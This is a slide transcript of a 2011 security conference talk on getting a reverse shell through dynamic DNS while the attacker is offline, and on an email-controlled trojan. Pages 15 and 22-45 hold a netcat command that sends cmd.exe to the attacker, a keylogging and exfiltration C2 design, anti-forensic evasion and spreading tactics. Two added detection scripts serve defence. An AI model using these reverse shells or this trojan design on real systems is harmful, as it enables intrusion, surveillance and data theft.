Handle Exploitation of Remote System Without Being Online!! By Merchant Bhaumik

Uploaded by: clubhack

Posted on: 26-May-2015


DESCRIPTION

ClubHack 2011 Hacking and Security Conference. Talk: Handle Exploitation of Remote System Without Being Online. Speaker: Merchant Bhaumik.

TRANSCRIPT

Page 1: Handle Exploitation of Remote System Without Being Online (Merchant Bhaumik)

Handle Exploitation of Remote System Without Being Online!!

By Merchant Bhaumik

Page 6

Who Am I?

• Currently helping local law enforcement and helping to secure some government websites

• Developer of IND 360 Intrusion Detection System (host-based as well as network-based detection)

• Communicating with the Metasploit guys to develop a term called "Universal Payload"

Page 7

Presentation Flow

• Reverse shell using dynamic-DNS concepts

• Getting data from the victim computer using the email tool

Page 8

We will understand this mechanism by considering one scenario.

Page 9

Jack's Situation

Jack works in a company in which all computers are behind the NAT box.

And he has just decided to break into one of the systems of his office and get a shell from the office to his home computer.

Page 10

Problems For Jack

• The company has NIDS/IPS (network IDS), so no inbound connections.

• He doesn't know what IP address is allocated by his ISP.

• He can't use any mechanism which constantly sends some outbound traffic.

Page 11

Good Thing For Jack

• Jack's office allows him to access his Gmail account and allows some outbound traffic.

Page 12

Part I: #INCLUDE <REVERSE SHELL>

Page 13

Why Reverse Shell?

• A reverse shell is one of the powerful methods for bypassing network intrusion detection systems, firewalls (most of them), etc.

• Because some of these network intrusion systems only monitor inbound connections, not outbound.

• Jack has a DMZ network in his office.

Page 14

Diagram 1: the office network (hosts 192.168.1.1 to 192.168.1.5, with a DMZ) behind the public IP 117.254.4.123, connected over the Internet to the individual IP 49.24.3.12.

Page 15

Diagram 2 (Normal Attack!): the same network as Diagram 1 (hosts 192.168.1.1 to 192.168.1.4, with a DMZ, behind the public IP 117.254.4.123); 49.24.3.12 is now the attacker IP.

Step I: Start handler on port 4343

nc -l -p 4343

Step II: Victim connects back to the handler

nc 49.24.3.12 4343 -e cmd.exe

Page 16

Normal Flow Of Getting Reverse Shell (for the reverse shell scenario!)

• Attacker starts handler

• Exploit! (vuln. injection and all that)

• Victim sends reverse shell to attacker machine!

• Attacker wins!

Page 17

But What's Wrong With Jack?

He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).

Page 18

Solution

The attacker is "offline" but still he will get the reverse shell.

Page 19

My Way (for the reverse shell scenario!)

• Attacker starts handler (starting the handler on the local machine is optional!)

• Exploit! (vuln. injection and all that)

• Victim sends reverse shell to attacker machine!

• Attacker wins!

Page 20

Flow Of Execution (Attacker!)

• Attack: exe running in the victim machine

• Attacker updates IP? Yes!! -> Attacker receives reverse shell. No!! -> the exe keeps running.

* If the attacker is not online, the exe is still up and running in the remote machine, and when the attacker updates the DNS records, the reverse shell is on the attacker's desk!!

Page 21

Mechanism

• If the code (first part) receives a positive acknowledgement of sending packets, Jack will get the reverse shell.

• Else it keeps running in the victim machine and waits for an ack from the attacker's machine.

Page 22

Dynamic DNS Way (Initially!)

• First Part: catchme.dyndns-ip.com (255.255.255.255)

• Second Part: payload.dyndns-ip.com (255.255.255.255)

New final exe consists of: First Part + Second Part, synchronous execution (single exe) -> New.exe

Page 23

Dynamic DNS Way (Finally!)

• First Part: catchme.dyndns-ip.com (127.0.0.1)

• Second Part: payload.dyndns-ip.com (attacker's IP)

New final exe consists of: First Part + Second Part, synchronous execution (single exe) -> New.exe

Page 24

Metasploit!!!!

• You can embed my method (or my exe) with a Metasploit payload of your choice. The structure of the new exe will be as follows:

New final exe consists of: My Tool + MSF payload (LHOST = dynamic), synchronous execution (single exe) -> New.exe
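From the network side, the pattern on pages 22 and 23 is visible in resolver logs: an internal host keeps resolving an external DynDNS name and keeps getting 127.0.0.1 or 255.255.255.255 back, until one answer turns into a routable address. The Python below is an added detection example, not the speaker's tool; it scans constructed resolver log lines of the form `<epoch> <client> <qname> <answer>` (the log format and the client addresses are assumptions, the hostnames are the talk's own) and reports names parked on a sentinel, plus the moment they activate.

```python
"""Detect the parked dynamic-DNS beacon from pages 22 and 23: an implant
resolves a DynDNS name again and again, gets a sentinel (255.255.255.255 or
127.0.0.1) while the operator is offline, and a real address once the record
is updated.  Added example, not the speaker's tool; log format is constructed."""
from collections import defaultdict
from ipaddress import ip_address

# Answers an Internet name should never legitimately return.
SENTINELS = {"255.255.255.255", "127.0.0.1", "0.0.0.0"}

# Constructed resolver log: "<epoch> <client> <qname> <answer>".
SAMPLE_LOG = """\
1700000000 192.168.1.3 mail.example.net 192.0.2.10
1700000060 192.168.1.4 catchme.dyndns-ip.com 127.0.0.1
1700000120 192.168.1.4 catchme.dyndns-ip.com 127.0.0.1
1700000180 192.168.1.4 catchme.dyndns-ip.com 127.0.0.1
1700000300 192.168.1.4 payload.dyndns-ip.com 255.255.255.255
1700000360 192.168.1.4 catchme.dyndns-ip.com 49.24.3.12
1700000420 192.168.1.2 localhost 127.0.0.1
"""

def parse_log(text):
    """Yield (epoch, client, qname, answer) for each non-empty log line."""
    for line in text.splitlines():
        if line.strip():
            epoch, client, qname, answer = line.split()
            yield int(epoch), client, qname, answer

def find_parked_beacons(text, min_queries=3):
    """Map (client, qname) -> verdict for external names a client resolved at
    least `min_queries` times to a sentinel.  'activated:<ip>' means a later
    answer became globally routable (the operator came online), else 'parked'."""
    answers_by_key = defaultdict(list)
    for _epoch, client, qname, answer in parse_log(text):
        if "." in qname:                      # skip localhost-style names
            answers_by_key[(client, qname)].append(answer)
    findings = {}
    for key, answers in answers_by_key.items():
        if sum(a in SENTINELS for a in answers) < min_queries:
            continue
        routable = [a for a in answers
                    if a not in SENTINELS and ip_address(a).is_global]
        findings[key] = f"activated:{routable[-1]}" if routable else "parked"
    return findings

if __name__ == "__main__":
    for (client, qname), verdict in find_parked_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {qname}: {verdict}")
```

Lowering `min_queries` trades false positives for earlier warning; the activation verdict is the one worth paging on, because it marks the moment the second part would connect out.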

Page 25

Hands On Network: the lab network for the demo, the same as Diagram 1 (hosts 192.168.1.1 to 192.168.1.5, with a DMZ, behind the public IP 117.254.4.123; the individual IP 49.24.3.12 is on the Internet side).

Page 26

Time To Enjoy Cooked Cookies And Recipes!!

Page 27

Demo

Page 28

Part II: #INCLUDE <EMAIL TOOL>

Page 29

Normal Remote Trojans & Viruses!

Attacker (must be online!) <-> Victim (must be online!)

Page 30

My Tool!!

Attacker: may or may not be online!!

Victim: may or may not be online!!

Caution: no need to be online, attackers!!

Page 31

So, How It Works??

Attacker -> Zombie -> Victim

Page 32

But, Who Is Zombie??

It may be one of the below (pictures on the slide).

Page 33

Features!!

• Execute operating system level commands by using emails!

• Get all network card information with allocated IP addresses!

• Live tracking of the system being used by the victim!

• Get the list of all available accounts!

• Enable/disable key logger!

• All this stuff with Gmail, Yahoo, Hotmail!!

Page 34

About It!

It is a simple application which, once up & going on the victim's computer, the attacker can handle using Gmail, Yahoo or Hotmail email services.

There is no need for the attacker to be online to attack the victim system.

The attacker has to send attack instructions to any of the mail services & then it is like sitting at the door & watching the event, "when it's gonna open!!"

As the victim connects to the internet, the attack launches & the results are automatically sent back to the attacker's email address.

Page 35

Cool Benefits!!

• If the email account is used via one of the below (pictures on the slide), then it is totally anti-forensic! No reverse detection is possible!

• Create a unique password for every individual victim who is infected.

• Ability to handle multiple clients simultaneously.

• Delete files on the victim's computer by simply sending an email.

• No antivirus can detect the attack because of HTTPS.

Page 36

Tool Syntax

Password_For_Victim : Task_Commands :

E.g. Pwd$98$ : Account_info :

"Pwd$98$" is the password for the particular victim.

"Account_info" is the command which sends back an email containing the account info on the victim computer!

Page 37

Snap Shot 1 (Load Attack Instructions): screenshot of the tool with the options "Send account info of victim", "Send drive info of victim", "Sends MAC, network card info" and the field "Password for individual victim".

Page 38

Snap Shot 2 (Get Back Attack Result): screenshot of my email account with the attached info of the victim's computer, as per the attacker's choice.

Page 39

Why Gmail??

Page 40

No Fear Of Detection 1

No direct connection between attacker & victim (diagram: Attacker ... Victim).

Page 41

No Fear Of Detection 2

No virus detection due to HTTPS. No digital signatures!! Ability to destruct itself!

Page 42

How To Spread This Code??

• Autorun.inf by USB drives

• Physical access to the victim's system

• During Metasploit exploitation

Page 43

Further Possible Development!!

This code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans by using this code.

Anyone can send exploits, trojans, rootkits, backdoors by simply attaching them to an email and sending it to his own account or the account that is configured in the victim's code.

Page 44

Pros N Cons 1 (Be Transparent!!)

The advantage is that the attacker is never going to get caught if he/she uses a browser through Tor, Anonymizer, VPNs or any proxy for accessing the attacking Gmail account.

No antivirus can detect the instruction data because all traffic is going to come over HTTPS!

Only a single Gmail account is going to be used for both sides. The attacker and the victim machine both connect to the same account, but the attacker knows and the victim doesn't!!

Page 45

Pros N Cons 2

The disadvantage is that if the victim has the habit of checking the current connections using commands like 'netstat -n', then there is a possibility of detecting the Gmail connection when actually there is no browser activity. But still it is difficult to detect, because the process is running in hidden mode.
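The weakness page 45 concedes (a mail-service connection while no browser is open) can be checked for rather than stumbled upon. The Python below is an added defender-side example, not the speaker's tool; it parses constructed `netstat -ano`-style rows together with a constructed PID-to-image map and flags established connections to HTTPS or mail ports whose owning process is not an expected browser or mail client (the process allow-list and the RFC 5737 sample addresses are assumptions).

```python
"""Flag established connections to mail or HTTPS ports owned by a process that
is not a browser or mail client: the 'Gmail connection with no browser
activity' that page 45 concedes netstat can reveal.  Added example, not the
speaker's tool; the netstat output and process table are constructed."""
import re

MAIL_PORTS = {443, 465, 587, 993, 995}
# Tune this allow-list per estate (e.g. svchost.exe also uses 443 on Windows).
EXPECTED_OWNERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
                   "outlook.exe", "thunderbird.exe"}

# Constructed output in the shape of Windows `netstat -ano` (RFC 5737 addresses).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.4:49152      203.0.113.5:443        ESTABLISHED     4120
  TCP    192.168.1.4:49160      203.0.113.5:443        ESTABLISHED     2032
  TCP    192.168.1.4:49171      203.0.113.6:993        ESTABLISHED     2032
  TCP    192.168.1.4:49180      192.0.2.10:80          ESTABLISHED     4120
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
"""
# Constructed PID -> image name map, as `tasklist` would report it.
SAMPLE_PROCESSES = {4120: "chrome.exe", 2032: "unknown_app.exe", 880: "svchost.exe"}

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")

def parse_netstat(text):
    """Yield (proto, local, foreign, state, pid); header and UDP rows don't match."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            yield proto, local, foreign, state, int(pid)

def suspicious_mail_connections(netstat_text, processes):
    """Return [(pid, image, foreign)] for ESTABLISHED connections to a mail or
    HTTPS port whose owner is not one of the expected browsers/mail clients."""
    hits = []
    for proto, _local, foreign, state, pid in parse_netstat(netstat_text):
        if proto != "TCP" or state != "ESTABLISHED":
            continue
        port = int(foreign.rsplit(":", 1)[1])      # IPv4 'host:port' form
        if port not in MAIL_PORTS:
            continue
        image = processes.get(pid, "<unknown>")
        if image.lower() not in EXPECTED_OWNERS:
            hits.append((pid, image, foreign))
    return hits

if __name__ == "__main__":
    for pid, image, foreign in suspicious_mail_connections(SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(f"PID {pid} ({image}) -> {foreign}")
```

A hidden process still owns a socket, so the PID column exposes it even when no window is visible; on a real host the allow-list needs tuning before this is usable as an alert.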

Page 46

Hands On Time! (Demo)

Page 47

For More

[email protected]

Page 48

Thanks guys for checking it out!